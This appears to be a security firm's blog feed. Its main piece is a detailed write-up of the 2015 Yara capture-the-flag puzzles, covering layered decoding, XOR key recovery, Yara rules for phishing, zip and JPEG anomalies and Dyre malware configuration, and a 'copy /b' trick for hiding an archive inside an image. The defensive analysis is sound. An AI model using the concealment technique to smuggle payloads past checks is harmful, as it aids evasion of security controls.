Also of note, I will be presenting a talk about Giles at this year's Black Hat USA in Las Vegas on August 1-6th. This talk will describe the reasons behind the creation of Giles, how it works, and how it can help you build efficient, simple event correlation engines and expert systems. Let us know if you're going to be at Black Hat this summer; we hope to see you there!

And remember, Giles is open source, so be sure to check it out (both in the look-at-it sense and in the grab-a-copy-of-its-code sense) at https://git.korelogic.com/giles.git/.

Hacking Team Documents Claim BIOS-based Persistence

$
0
0

A search through the online mirror of the information stolen from Hacking Team shows indications that a BIOS-based infection capability was developed as part of the Remote Control System software. This may be the first time a commercial spyware product claims this type of capability.

LibPathWell 0.6.1 Released

$
0
0

I am thrilled to announce the first public release of the Password Topology Histogram Wear-Leveling (PathWell) library and PAM module for dynamic password-strength enforcement. Version 0.6.1 is available for download here.

We have blogged and written and presented about PathWell several times, but now we've finally dropped the code.

The LibPathWell release is a PAM module and supporting library to implement password topology complexity enforcement. There is a static component called blacklisting that allows you to seed the PathWell database with the most popular password topologies, so instead of an attacker cracking 25%+ in their first few mask attacks, they get zero. And then there are dynamic components ensuring that enterprise users, as they change their passwords, are forced to choose new passwords that are substantially different from one another.

tl;dr: PathWell makes enterprise user passwords 5-6 orders of magnitude harder to guess!

This release is not the current code. It is basically the last version cut at the end of our DARPA-sponsored CFT (Cyber Fast Track) project, with an appropriate open-source license applied. We've been working on making PathWell more user-friendly, like the password creation guidance I alluded to at the end of the presentation linked above.

But that code isn't done yet, and we got tired of the existing code not being available to the public, so here it is.

License

LibPathWell is released under the GNU Affero General Public License Version 3 (AGPLv3). See the README.LICENSE file in the distribution tar ball for all the legalese - basically this is just like the GPLv3 except that it also explicitly applies to network services that users interact with (without "running" programs in the conventional sense). There is a patent on the topology wear leveling stuff; use of that is granted by the software license as long as you comply with it. If you want to implement PathWell in a commercial operating system, website, or Identity Management product in a way that isn't compatible with AGPL (i.e., closed-source), or you want us to do so, talk to us.

Known Issues

This branch was effectively frozen in late 2013. Since then, some current Linux distributions' dependencies have changed. Everything works great on current Gentoo, but you may encounter header file issues with recent versions of some of the other distributions (e.g., Ubuntu) listed in README.INSTALL as supported. Meanwhile, some distributions whose libraries were too old at the time (I'm looking at you, RHEL) may now work out of the box, so our documentation needs updating. We'll push those fixes to the public git repository as we can, but probably not before DEFCON; we have a contest to run. Be sure to watch our git repository, or better still, submit some patches. ;)

Mushy Stuff

I can't thank enough my coworkers who did more to make PathWell an actual thing than I did. Particularly Klayton, Sean, and Mick; without your efforts and persistence this would just be another idea rotting in the back of my brain while I chase squirrels.

How I Solved (Most Of) the Yara CTF Puzzles: Puzzle #1 - #4

$
0
0

During Black Hat, Ron Tokazowski of phishme.com put together a Yara Capture The Flag (CTF) contest for Black Hat 2015. This CTF consisted of 11 logic and Yara-based puzzles that participants had to solve for a chance to win a DJI Quadcopter. The best part is you could participate in the CTF if you weren't at Black Hat!

I participated in the CTF and won!!! I got through 10 out of 11 puzzles; the 11th and my lack of doing it is explained later. This post, as well as two more, describe how I went through each puzzle and solved them. The puzzles are still accessible at the CTF page, so be warned that spoilers are below!

Capture the Flag contests are an important resource for anyone in information security. When performed correctly, they help to increase your skills and expand your methods and techniques for solving problems. There has never been a CTF that I haven't learned something, and because of this I try to do as many of them as my schedule allows.

In each puzzle I present in these posts, I'll go through my thought process for how I solved it. Understand that there are probably better ways to solve these, but when you are in a timed contest you go where your mind takes you, which is sometimes down incorrect or the least efficient paths.

As stated, the Yara CTF consisted of 11 challenges that had to be solved. The CTF also came with an email template that listed what needed to be provided for each puzzle solution.

Puzzle #1

The first puzzle was in a 1.2MB file named "all about that base" and the goal was to find a key contained within. The contents of the file were an alphanumeric pattern in one line that ended with the following:

...WFZtMUtSbE5zV2xWV1ZrWXpWVVpGT1ZCUlBUMD0=

Anyone doing CTF challenges should know that when dealing with encoded data there are a few things you should always look for. The first is Base64 encoded data. Data encoded with Base64 consists of upper- and lower-case letters, numbers, plus, and the forward-slash. More importantly, it will often end in a single or double equal sign, as the string above.

Base64 decoding the string returned another base64 encoded string. Decoding that gave another base64 encoded string, which gave another base64 encoded string, and so on. The goal was to get to the bottom of all the base64 encoded strings - which I could either do manually, or write a small shell script. I went with the script.

#!/bin/bash

cat "all about that base" | base64 -d - > _tmp
while [ $? -eq 0 ]; do
  mv _tmp still_decode
  cat still_decode | base64 -d - > _tmp
done
mv still_decode decoded.txt

This script runs the command "base64 -d" in a loop to decode the data until it fails. Once this occurs, we know we are done decoding the data and hopefully have the decoded version.

The final file that was created was 1,657 bytes long and contained a nice ASCII art of a unicorn and the answer. I won't spoil this answer so you can try it on your own.

Puzzle #2

The second puzzle contained an encrypted RAR archive and a readme file. According to the readme, the goal was to identify the import hash, PE timestamp, and PE machine for the file in the RAR archive and create a Yara rule for it.

Windows executables are organized in a specific format known as the Portable Executable (PE) format. This format gives the operating system information about the executable, including where to start execution in the program, and what libraries and APIs should be loaded. Two of the fields the puzzle asks for, the PE timestamp and PE machine, are located in the PE header.

The PE timestamp, also called the TimeDateStamp, usually contains the time when the executable was linked during the compilation process. This field is often used by analysts to determine how old the executable is. However, be warned! This value can easily be changed by attackers.

The PE machine is a field that specifies the CPU type the executable can run on. For example, if its a 32-bit executable, it will likely have the value 0x14C (IMAGE_FILE_MACHINE_I386).

This information can be found with any number of PE header analysis tools. I used pecheck.py, a script written by Didier Stevens that uses the pefile Python library to dump all of the PE header information. Using this I was able to quickly find what the PE timestamp and machine values were:

$ pecheck.py my_file.exe 
PE check for 'my_file.exe':
Entropy: 6.913703 (Min=0.0, Max=8.0)
MD5     hash: 75c0cd3b15b1b67de14f4e97eafa3679
SHA-1   hash: 157ad48ab9f1bf257627272d16e83fe748d16985
SHA-256 hash: 659c865cfc57226fafd40a97f4fc21a0e5b828ab6f9bdcb3ca0de175b654a68b
...
[IMAGE_FILE_HEADER]
0xEC       0x0   Machine:                       0x8664    
0xEE       0x2   NumberOfSections:              0x3       
0xF0       0x4   TimeDateStamp:                 0x4F304133 [Mon Feb  6 21:08:03 2012 UTC]
...

The timestamp has a value of 0x4F304133 and the machine type is 0x8664 (IMAGE_FILE_MACHINE_AMD64).

The import hash is a hash that is created by examining the Import Address Table of an executable, which describes the DLLs and APIs that the executable want to load. Since many executables place this information in a unique order, this hash can be used to identify and track related malware samples or attackers. To generate the import hash, I used Florian Roth's ImpHash-Generator script.

$ python imphash-gen.py -p my_file.exe
###############################################################################
 
  IMPHASH Generator
  by Florian Roth
  January 2014
  Version 0.6.1
 
###############################################################################
Reading DB: 37694 imphashes found
IMP: bb916724e1b87e3af628b2f59174d064 MD5: 75c0cd3b15b1b67de14f4e97eafa3679 FILE: my_file.exe

Now that I had the data needed, the Yara rule had to be created. Fortunately, the latest versions of Yara come with a PE module that will allow me to directly obtain these values, as well as a function that generates the import hash! The resulting Yara signature is shown below:

import "pe"

rule PM_Yara_CTF_2015_2
{
	meta:
		author = "thudak@korelogic.com"
		comment = "Solution 2"
	condition:
		pe.machine == 0x8664 and 
		pe.timestamp == 0x4F304133 and 
		pe.imphash() == "bb916724e1b87e3af628b2f59174d064"
}

Two things to note. Initially when I created this rule I was using Yara 3.3.0. For some reason, pe.imphash() would not run correctly. However, after upgrading to Yara 3.4.0 (the latest version at the time), things worked fine.

Also, the rule is checking for the actual value of pe.machine. The Yara PE module has a number of definitions available to make the rules more readable. Therefore, the rule could also have been written "pe.machine == pe.MACHINE_AMD64".

Puzzle #3

The third puzzle was a file named "take off every zig" whose contents were an encoded string that contained a key:

Bar bs gurz unf gb or rnfl gb znxr lbh xrrc tbvat.
Lbhe nafjre vf: ZneznynqrFrzncuberErpvqvivfgVyyvgrengrXhzdhngTbbsonyy

Because there were spaces in the string, I knew it was not likely to be base64 encoded. Also, the spaces told me it was also probably not XOR encoded, another common encoding method we'll talk about later.

Why did the spaces tell me this? Both of these encoding techniques would have encoded the entire string, including spaces. It was quite possible that the attacker was being tricky and had written a custom algorithm to skip spaces and I kept that in the back of my mind. In the mean time, I decided to go with my gut and try something else: ROT13.

ROT13 is a Caesar cipher, or a substitution cipher in which all letters are rotated by 13 letters (or half the English alphabet). To test this out, I used the website www.rot13.com, pasted the string and pressed the decode button...

...and Voila! It worked! The result gave me the key I needed for the answer.

Puzzle #4

Puzzle #4 contained three phishing emails, and their mail headers, in which we were supposed to create one Yara rule to detect them all. To do this, I examined each email looking for items that were common to each other but unique to these emails. I came up with three things: the subject line, the attachment filename, and the message body.

There were other locations I could have used, such as the sender or the source MTA. However, these didn't have any common attributes between the three emails; the other items did.

The subject lines of all three emails were as follows:

  • 1.eml:Subject: Resume
  • 2.eml:Subject: resume
  • 3.eml:Subject: =?utf-8?Q?Re=3AMy_resume?=

The first two are just the word "resume", in different case, while the last is the UTF-8 encoding of "My_resume". The common word between all three is "resume" and thus I had my first string to search for. I decided to use a regular expression to search for "Subject: ", followed by any number of characters, and then the word resume where the 'r' could be upper or lower case.

  • $subject = /Subject: [\S\s]+[rR]esume/

Next was the attachment file name. The three emails named their files as follows:

  • 1.eml:Content-Disposition: attachment; filename="my_resume.zip"; size=462;
  • 2.eml:Content-Disposition: attachment; filename="my_resume.zip"; size=460;
  • 3.eml:Content-Disposition: attachment; filename="=?utf-8?B?bXlfcmVzdW1lLnppcA==?="

The first two emails have the name just as "my_resume.zip". The last is also named my_resume.zip, but the filename is base64 encoded. Since Yara does not have any base64 encoding or decoding functions, I would have to create two strings to search for both versions of the filename.

  • $filename = "my_resume.zip"
  • $file_b64 = "bXlfcmVzdW1lLnppcA=="

Finally, the message bodies of the emails. The first two email bodies were base64 encoded while the last was in plaintext. The plaintext version is below.

Hello my name is Ariana
 attach is my resume
I would appreciate your immediate attention to this matter

Sincerely
Ariana

Of course, all three were just slightly different. In each email, the name and the third lines were completely different. Additionally, in one email the second line stated "attached" instead of attach. Finally, the first word was "Hello" in two of the emails and "Hi" in the final email.

Looking for a common string between all three emails, I found that my best bet would be to search for "my name is". This would also mean I would have to search for the plaintext and base64 encoded versions of the string. The plaintext was easy, but the base64 was a little more difficult due to the position of the first word. However, I got lucky and found that part of the base64 encoded version of "my name i", or "bXkgbmFtZSBpc" was present in both base64 encoded versions of the email bodies. This allowed me to create the final strings for the Yara rule.

$hello = "my name is"
$hello_b64 = "bXkgbmFtZSBpc"

The final Yara rule looked as follows:

rule PM_Yara_CTF_2015_4
{
	meta:
		author = "thudak@korelogic.com"
		comment = "Solution 4"
	strings:
		$subject = /Subject: [\S\s]+[rR]esume/
		$filename = "my_resume.zip"
		$file_b64 = "bXlfcmVzdW1lLnppcA=="
		$hello = "my name is"
		$hello_b64 = "bXkgbmFtZSBpc"
	condition:
		$subject and ($filename or $file_b64) and ($hello or $hello_b64)

}

More to come!

This is long enough for one post. In the next post, I'll reveal how I solved puzzles 5-8!

How I Solved (Most Of) the Yara CTF Puzzles: Puzzle #5 - #8

$
0
0

Previously, I posted how I solved puzzles #1-#4 of the Yara CTF for Black Hat 2015, sponsored by phishme.com. In this post, I'll go into how I solved puzzles #5-#8.

As noted before, the puzzles are still accessible at the CTF page, so there are spoilers if you plan to go through them.

Puzzle #5

The fifth puzzle consisted of a zip archive named "cyber apt cloud attack simulation.zip" and a readme file. Within the archive were two files named "bad.exe" and "bad2.scr". The readme read:

Many times, attackers will use zip files in order to contain their malware to help
avoid detection. Create a rule that would look for this type of behaviour.

The solution to this was to create another Yara rule, so I took that to mean a Yara rule that would detect exe or scr files within a zip archive. In order to do that, I would need to look at the specification for the zip archive format. I used two places for references: Wikipedia, and the specification from PKWARE.

When creating the Yara rule, we first have to make sure we're dealing with a zip archive. According to the specification, zip files should begin with a local file header, or the structure that describes files in the archive. This structure begins with the little-endian hex number 0x04034b50. Note that when looking at that in a hex editor, you'd actually see it reversed.

Yara has a few commands that will allow you to obtain a string or value from a specific offset within a file. Since the spec says the signature will be at the first byte of the zip archive, we can write a Yara condition to see if our signature is at byte 0. The uint32() Yara command will return an unsigned little-endian 32-bit integer at a specific offset. Using that, the rule can test for the zip archive signature:

uint32(0) == 0x04034b50

A zip archive will also have a local file structure for each file in the archive. The local file structure contains information such as the compressed and uncompressed file sizes, the compression method, and the file name. Since our goal is to find file names that contain ".exe" or ".scr", we'll need to parse through every local file header, find the file name (which starts at offset 30) and see if it contains .exe.

Yara allows us to do this by using the for .. in condition to iterate through strings found in a file. By iterating through all local file header values, we can jump to the file name offset and search it for the extensions we are looking for.

To do so, we first need to create a string of the local file header signature:

$local_file = { 50 4b 03 04 }

Then we instruct the Yara rule to loop through each instance of this value, or the start of each local file header, in the archive we are examining:

for any i in (1..#local_file):
 	( $ext_exe in (@local_file[i]+30..@local_file[i]+30+uint16(@local_file[i]+26)) or
	  $ext_scr in (@local_file[i]+30..@local_file[i]+30+uint16(@local_file[i]+26))
	)

Breaking this down, we are looping through each instance of the local file header with the for any i in (1..#local_file) statement.

Remember that the file name starts 30 bytes after the start of the header, which we can specify with @local_file[i]+30. (The @variable[i] format in Yara returns the location of the i-th instance of a string.)

The length of the filename is 26 bytes after the start of the header, which we can get with uint16(@local_file[i]+26). This statement takes the location 26 bytes after the start of the header, and converts it to an unsigned 16-bit integer.

Thus by using these two values, we know where the file name starts and stops. We can search this space for the ".exe" and ".scr" extensions using the in keyword and specifying the start and stop of the filename.

The final Yara rule became the following:

rule PM_Yara_CTF_2015_5
{
    meta:
        author = "thudak@korelogic.com"
        comment = "Solution 5"

    strings:
        $local_file = { 50 4b 03 04 }
        $ext_exe = ".exe" nocase
        $ext_scr = ".scr" nocase

    condition:
        // look for the ZIP header
        uint32(0) == 0x04034b50 and
        // make sure we have a local file header
        $local_file and
        // go through each local file header, find the filename,
        // and see if it has an extension we are looking for
        for any i in (1..#local_file):
        ( $ext_exe in (@local_file[i]+30..@local_file[i]+30+uint16(@local_file[i]+26)) or
          $ext_scr in (@local_file[i]+30..@local_file[i]+30+uint16(@local_file[i]+26))
        )
}

Puzzle #6

This puzzle was evil.

Contained within this puzzle was a jpeg of Austin Powers and a readme.txt file that stated "Good luck!" The solution to this puzzle was a Yara rule, and the answers to the questions "How's it encoded?" and "What's the filename inside?" To me, this meant that there was a file hidden inside the image. In other words, steganography!

Admittedly, this puzzle took me a while because I kept going in the wrong direction. I had convinced myself that a stego program had been used to hide a file inside the image. When steganography is suspected, there are a few tools that can be used to detect the steganography program that had been used. Unfortunately, these all came back with no results. This meant I was either going in the wrong direction or I had to find a different stego program that had been used. I started with the latter method, searching the Internet for any stego program I could and trying it out on the image. Once again, no results.

After too long, I decided to try a different approach and read over the JPEG file format. It turns out that JPEG images, like some other file formats, have a specific marker to indicate the end of the file. For JPEGs, this is the value 0xFF 0xD9. A quick examination of a dozen or so JPEGs on my local system showed this was the case - all ended in 0xFF 0xD9. Interestingly, the JPEG in the puzzle did not.

I pulled up the JPEG in a hex editor and found 233 bytes present after the end of file marker, marked in green in the image below. While this could have been bytes thrown there by the image creation software, it was worth pursuing.

There is a technique for copying files to the end of an image using the copy command in Windows. Using the command below, you can combine two files together (original.jpg and hidden.zip) and place them in a new file (newimage.jpg). This is an effective, and simple, way to hide one file at the end of another.

copy /b original.jpg + hidden.zip newimage.jpg

I extracted the extra bytes from the jpeg and examined them. From the answer template I knew it was encoded in some fashion, so I needed to figure out what encoding was used. In the last post, I mentioned that when you do puzzles like this there should always be a few things you look out for. The first is base64 encoding, which we could tell this was not due to the presence of non-ASCII characters. The second, is XOR encoding.

XOR (exclusive or) is a mathematical operation that is commonly used to hide data. While we don't need to get into the details of XOR, there are a couple properties of XOR that you should remember.

  1. A XOR K = C and C XOR A = K. That is, if you XOR a value (A) with a key (K) to get ciphertext (C), you can get the key (K) by XOR'ing the ciphertext (C) with the original value (A).
  2. Anything XOR'd by zero (0) is itself.

These two properties can be used to determine the XOR key that was used to encode data, assuming XOR was used. If we can guess what some of the values of the file may be, such as a file signature, we can apply those values to the file and see if we get something that looks like a key. For example, if we thought this was a PE executable, we could XOR the first two bytes by MZ, which is the signature of a PE executable, and see if we found a repeating pattern. This is usually a hit or miss operation and can be time consuming. Fortunately, there is an easier way.

Anything XOR'd by 0 is itself. So, if there were locations in a file containing only 0s and an XOR key was applied to it, then the key itself would be revealed. Guess what? Most binary files have places in them that contain only zeroes. We only need to look through the encoded data for any patterns and try those patterns as our key.

Looking at the encoded data, you'll notice there are some large areas of the letter B (0x42). This could be our XOR key. Using a hex editor, I applied the value 0x42 to the entire file to see what happened:

The result should look familiar - a Zip archive! In the image above, we can see that not only did it decode, but the filename inside is malicious.exe! This answered our first two questions - how the file was encoded and what the file name was. Now onto the Yara rule.

The contest didn't specify what the Yara rule should be, so I decided to create one that detected JPEGs that had extra data at the end. This is shown below.

rule PM_Yara_CTF_2015_6
{
	meta:
		author = "thudak@korelogic.com"
		comment = "Solution 6 - finds data after the jpeg final marker"

	strings:
		$header = { ff d8 ?? ?? ?? ?? 4A 46 49 46}

	condition:
		// JPEGs should always end with 0xffd9 - if not, there is something else there
		$header at 0 and uint16(filesize-2) != 0xd9ff

}

The rule first looks for the JPEG header, to ensure we are looking at a JPEG image. JPEG headers start with the value 0xFF 0xD8, followed by the JFIF APP0 marker segment. The first 4 bytes of this segment contain an APP0 marker and the length of the segment. From looking at multiple files, these weren't always the same values (even though I suspect they should be). After those bytes are the characters "JFIF", or 0x4A 0x46 0x49 0x46 in hex. This is how the $header string for the rule was created.

Next the rule looks to see if the last two bytes of the file are the end of file marker, 0xFF 0xD9. Yara contains a keyword filesize which will contain the size of the file it is looking at. Since the last two bytes of the file are supposed to contain the end of file marker, we can extract those bytes using uint16(filesize-2), and see if they are the end of file marker. If they aren't, we've found extra data at the end of our image.

Note that in the Yara rule, we are examining for 0xd9ff - a reversal of the end of file marker. This is because uint16() extracts the little-endian format of those bytes, so the values would be reversed. I could have used the Yara command uint16be() and extracted them in the order I would expect them in.

Puzzle #7

The next puzzle consisted of two more zip files, named encrypted_zip.zip and not_encrypted.zip, and a readme that instructed us to create a Yara rule that would detect the encrypted zip file, but not the unencrypted one.

Luckily, I had a slight advantage on this one. In my work on MASTIFF, I had created a plug-in that would analyze the structure of a zip archive, so I already knew how files were marked as encrypted or not.

Six bytes into the local file header, the structure kept for each file, is a field called the general purpose bit flag. This field will set specific bits to describe various options for the file within the archive. There is one bit in that field we need to examine: bit 0. If set, this bit signifies the file is encrypted.

By creating a Yara rule that looks at this field for each local file header, we can perform a boolean AND operation to see if the bit is set. If it is, then the file is encrypted. The resulting Yara rule is shown below:

rule PM_Yara_CTF_2015_7
{
    meta:
        author = "thudak@korelogic.com"
        comment = "Solution 7 - encrypted zip file"

    strings:
        $local_file = { 50 4b 03 04 }

    condition:
        // look for the ZIP header
        uint32(0) == 0x04034b50 and
        // make sure we have a local file header
        $local_file and
        // go through each local file header and see if the encrypt bits are set
        for any i in (1..#local_file): (uint16(@local_file[i]+6) & 0x1 == 0x1)		
}

Look familiar? It should, because I essentially copied the Yara rule from puzzle #5 and modified it slightly.

In this rule, we are checking to ensure we are dealing with a zip archive, and then going through each local file header and examining the general purpose bit field that is 6 bytes from the start of the header. The bit field is AND'd with 0x1 and checked to see if the result is 0x1. If it is, we know the encrypted bit was set and our rule should fire.

A small side note

Confession time. The Zip Yara rules for puzzles 5 and 7 are not the same ones I turned in. As I was writing this up, I realized that my rules were only looking at both the central file directory header in the zip files, as well as the local file header. This isn't a problem, except that the offsets for the file names, lengths, and general bit field are different in the central structure and local file headers.

For puzzle #5, this wasn't an issue as I was using the offsets for the local file headers as I should have been; it was just doing a little extra work when it found the central directory file header. For puzzle #7, it was only looking at the general bit field for the central directory file header, which is at offset 8. While the rule would still work as the encryption bit would be set in the central directory file header, it could also create a number of false positives and was thus corrected above. Sorry.

Puzzle #8

The final puzzle in this post was a tricky one, as I went down a path that in the end wasn't needed. This puzzle contained a minidump crash report named some_file.dmp, and the instructions to create a Yara rule and answer the questions "What's the malware?" and "What's the configuration data?".

As I was unfamiliar with minidump files, I had to do some initial research. Minidump filescontain information about a system and its processes at the time the minidump was created, typically when a process or system has crashed. In other words, they will contain portions of the memory from the system. By analyzing the minidump, we have a view into the compromised system to hopefully determine what the issue was. The way I choose to analyze the file was to use WinDbg.

After loading the minidump file into WinDbg, I ran a number of commands, such as "!analyze -v", that told me this was a crash dump of explorer.exe. For my purposes, this meant we were dealing with malware that either had renamed itself as explorer.exe or injected itself into explorer.exe. Additional commands did not show me anything unusual, such as oddly named DLLs. Admittedly, my WinDbg skills are not at a premium as I prefer other debuggers, so I may have not been running some commands that would have given me more clues.

However, on a hunch I ran a string search for the string "serverlist". Often in these types of contests, you'll get a gut feeling on what to search for. You have to follow your gut and see if you are right - if you are it can pay off tremendously. In this case I got lucky and my search paid off.

From the puzzle questions, I knew I was looking for malware that had a configuration file. From the minidump analysis, I had explorer.exe. The only malware I could quickly think of that utilized both was Dyre, a popular banking malware that injects itself into explorer.exe and has a configuration file. The string "serverlist" is one of Dyre's configuration file commands.

Upon finding the string "serverlist", I knew we were dealing with Dyre and just had to pull out its configuration file. After a few searches and mis-steps, one of which involved trying to get Volatility to read minidump files, I found a Python script by phishme.com to extract the Dyre configuration file from memory crash dumps! This script successfully extracted the configuration file from the crash dump.

For the Yara rule, I decided to focus on the Dyre configuration file since it has a number of static configuration options that can be easily detected. The resulting rule is below.

rule PM_Yara_CTF_2015_8
{
    meta:
        author = "thudak@korelogic.com"
        comment = "Solution 8 - look for dyre config"

    strings:
        $ = "<serverlist>"
        $ = "<server>"
        $ = "</server>"
        $ = "</serverlist>"
        $ = "<rpci>"
        $ = "</rpci>"
        $ = "<litem>"
        $ = "</litem>"

    condition:
        all of them
}

More to come!

In my opinion, puzzles 5 through 8 were the most challenging of the CTF. They did what good CTF puzzles should do - they make you think and work down paths that many will not normally go down (at least until they've experienced it). Most importantly, they used techniques that analysts and responders are likely to find in their daily work.

Next up, the last three puzzles!

How I Solved (Most Of) the Yara CTF Puzzles: Puzzle #9 - #11

$
0
0

So far I've discussed how puzzles #1-#4 and puzzles #5-#8 in the Yara CTF for Black Hat 2015 contest were solved. In this post, I'll go over the final three puzzles.

As noted before, the puzzles are still accessible at the CTF page, so there are spoilers if you plan to go through them.

Puzzle #9

Puzzle #9 contained a single file named strangers composed of one long base64 encoded string. A "key" was required for the answer. Decoding the string returned 571 bytes of binary data.

I initially opened the data in a hex editor and started looking for patterns. Patterns can often be indicative of XOR obfuscation and may lead you to an XOR key. Unfortunately, after a few minutes of this I hit a wall and needed to change my train of thought.

I had run the UNIX command file over the binary data in the hopes it might identify a specific file type. This didn't work, so I decided to google the first few bytes of the data in case it was a known file header that file didn't detect. Fortunately, searching for "78 9C" had a number of hits indicating this was the header for data compressed with the zlib algorithm (with default compression)!

Zlib is a commonly used data compression algorithm. Many tools are available to decompress encoded data, such as gzip. However, tools like gzip require a gzip header to decompress the data, which wasn't present here. The solution? Add our own header and decompress:

The result of the command above returned another base64 encoded string. Decoding that gave the following message:

Oooh \ We're no strangers to love \ You know the rules and so do I \
A full commitment's what I'm thinking of \ You wouldn't get this from any other guy \
I just wanna tell you how I'm feeling \ Gotta make you understand \ Never gonna give you up \
Never gonna let you down \ Never gonna run around and desert you \ Never gonna make you cry \
Never gonna say goodbye \ Never gonna tell a lie and hurt you . Oh yea, about The game. And for
those who know "The game"...yup, you just lost. But back to this game. The real game. What is
the MD5 hash of a1d0c6e83f027327d8461063f4ac58a6 and 69cbe89bfa6370e0ab07df9a6096d3d2. No spaces,
no end lines...just yummy hex goodness.

Now the file name strangers made sense. However, we weren't finished. We still needed to figure out what the hashes in the message were, combine those values, and create an MD5 hash of that.

The two hashes in the output are MD5 hashes themselves. Since MD5 is a cryptographic hash, there is no way for me to reverse the hash into its original value. That means I would normally have to treat these like a password hash and brute force different values until I got that hashes I was looking for. Fortunately, there are many sites that have already generated MD5 hashes for lists of many different words and values. The solutions, therefore, were just a google search away.

Through some online searches, it turned out that "42" produces the MD5 hash a1d0c6e83f027327d8461063f4ac58a6, and the words "yesnomaybe" produce the MD5 hash 69cbe89bfa6370e0ab07df9a6096d3d2.

Combined as "42yesnomaybe", we produce our answer, the MD5 hash e71c9f0afccd29db1dc70daa9ea6e84b.

Puzzle #10

The goal of puzzle #10 was to obtain an "answer". The only file available was named "cute animal" and was the following string:

1b2d37622f37313662252d62243730362a2730622b2c362d62362a2762302320202b36622a2d2e276e620a23
2c6c620d2c2e3b62362a272c62352b2e2e623b2d3762242b2c2662362a276236303727622130272336373027
78627b2172777370747026727b7b26267b7076772026777026247a717b74737074754242

This string consists only of hex characters - 0-9 and a-f. While this could have been a base64 encoded string (it does decode properly, albeit into binary goo), it was more likely this was a string of hex bytes. This was even more likely due to the fact that by looking at them they would convert to ASCII characters. Using a small Perl script I wrote, I converted them to their byte values and got the following:

00000000  1b 2d 37 62 2f 37 31 36  62 25 2d 62 24 37 30 36  |.-7b/716b%-b$706|
00000010  2a 27 30 62 2b 2c 36 2d  62 36 2a 27 62 30 23 20  |*'0b+,6-b6*'b0# |
00000020  20 2b 36 62 2a 2d 2e 27  6e 62 0a 23 2c 6c 62 0d  | +6b*-.'nb.#,lb.|
00000030  2c 2e 3b 62 36 2a 27 2c  62 35 2b 2e 2e 62 3b 2d  |,.;b6*',b5+..b;-|
00000040  37 62 24 2b 2c 26 62 36  2a 27 62 36 30 37 27 62  |7b$+,&b6*'b607'b|
00000050  21 30 27 23 36 37 30 27  78 62 7b 21 72 77 73 70  |!0'#670'xb{!rwsp|
00000060  74 70 26 72 7b 7b 26 26  7b 70 76 77 20 26 77 70  |tp&r{{&&{pvw &wp|
00000070  26 24 7a 71 7b 74 73 70  74 75 42 42              |&$zq{tsptuBB|

With the exception of the first byte (an escape character) and some carriage returns, all the values were ASCII characters. Additionally, there were a large number of lower-case b's (0x62). This would typically mean the first thing I'd try was XOR encoding using 0x62 as the initial key. However, for some reason I got hung up on the initial escape character.

Probably due to the fact I had been working on these puzzles for about 4 hours straight at this point, my mind wasn't exactly where it needed to be. I got focused on that initial escape character, convinced that it was a clue to the solution. My mind immediately went to PJL and I started scouring the Internet for any resource I could find on it. After spending too much time on it, I decided this was the wrong path.

My next thought was that it might be some esoteric programming language and I looked up every weird language I could find. Another dead end. For some reason, I was still convinced it wasn't XOR encoding and was looking for more possibilities when a co-worker, whom I had reached out to venture a guess from, suggested XOR.

Despite my stubbornness, I tried XOR decoding everything with 0x62 and got the following:

It worked...somewhat. After momentarily getting over feeling stupid, I jumped back into the game and looked at the result. While the text decoded into words, it didn't look right. Notice how the the case is switched and not all values decoded into something readable. We were on the right path, but hadn't gotten there completely.

The switched case was a big clue. The difference in values between upper- and lower-case ASCII characters is 32, or 0x20. For example, the value of 'a' is 97 (0x61) and the value of 'A' is 65 (0x41). Therefore, if you ever perform an XOR decode and it looks like the case is switched, try adding or subtracting 0x20 to the XOR key. In this case, I subtracted 0x20 from the key to use 0x42 and got the following output:

We finally had decoded the message, but needed to go one more step. Searching for the MD5 hash 9c051262d099dd9245bd52df83961267 found that the solution to puzzle #10 was "mudkipz".

Puzzle #11

Puzzle #11 only contained a readme.txt file that stated the following:

Create an exploit for the newest version of Yara. We will be excercising responsible disclosure and
submitting this to the developers, as Yara is an awesome tool and it's something we all use. :)

I did not complete this puzzle. There are a few reasons why.

First, I did attempt it. While I looked at the code for Yara, I suspected that the most likely place a vulnerability would lie would be in the module code, such as the PE module code that examines PE specific characteristics. My thought process was that I could use a fuzzing program to fuzz the internal fields of the PE format, send it to Yara, and hope it fails. While I began to search for a fuzzing program that could do this, I started to run every file on my system through Yara in the hopes I would get lucky.

However, after two hours, I did not find anything so I decided to weigh my options. This was a timed CTF where, according to the instructions, the "First person to email in all the answers or has the highest score wins". I could take a chance and try to find a vulnerability, and then write an exploit for it, to get more points; or I could submit it now, not get the points, and hope I was either still high enough in points or the first one in.

Since I know my own skills and what I can accomplish in the span of a day, I decided to take a chance and send in the CTF as is. I wrote a small explanation at the end of Puzzle #11 about what I had attempted, and so I wasn't turning anything in, I also wrote a small haiku poem:

Yara is the best
For finding bad stuff inline
Plusvic is the man!

Conclusion

Overall, the Yara CTF for Black Hat 2015 by phishme.com and @iheartmalware was an excellent contest. While, to me, the 11 puzzles weren't overly difficult, they were challenging and required you to think in ways you may not normally go.

Most importantly, they used techniques that attackers use on a daily basis in malware and their attacks against your systems. Every one of the puzzles either used a technique that I've had to go up against "in the wild" or, in the case of the minidump crash file, used an actual infection. Anyone doing incident response should at least be somewhat familiar with the techniques used in every one of these puzzles, and should be exposed to the methods to get around them.

That being said, I would have to say I have two minor criticisms about the contest. First, some of the instructions were ambiguous and open to interpretation. There were times I had to guess what Yara rule I had to write or what information I had to get for the answer. While this may have been on purpose to see what solutions participants would come up with, I can see how it may have frustrated others.

Second, the final puzzle was a bit of an odd-ball to me. I completely understand why the creators put it in there. Yara is an excellent tool and finding vulnerabilities in it means the tool becomes better and stronger. However, I feel that its out of place because this was partially a timed contest. Finding a vulnerability and then writing an exploit for it takes time. In a contest where you may possibly need to be the first submission, this adds tremendously to that time and could cost you the game.

My suggestion for puzzle #11 would be to instead take it in one of a few directions:

  • Give the player an existing vulnerability, have them write an exploit for it, and then write a Yara rule to detect that exploit.
  • Give the player an existing exploit, such as a malicious document or Java exploit, and require a Yara rule be written for it.
  • Take it in an entirely different direction. It is obvious the creators of the CTF want to make Yara better, so have the participants create a new module for Yara with some requirements surrounding it.

Of course, these are just suggestions and my opinion. Regardless, this was a great CTF and I plan on recommending it to those who ask me what they should do to increase their skills. I hope the creators do it again next year and I look forward to participating!


MASTIFF Output Plug-ins

$
0
0

MASTIFF is a living project whose continuous goal is to provide an automated means for static analysis of files. To meet this end, the project has multiple short and long term goals in place. Recently we silently released an update that hit one of the major goals we have been working towards since inception of the project: output plug-ins.

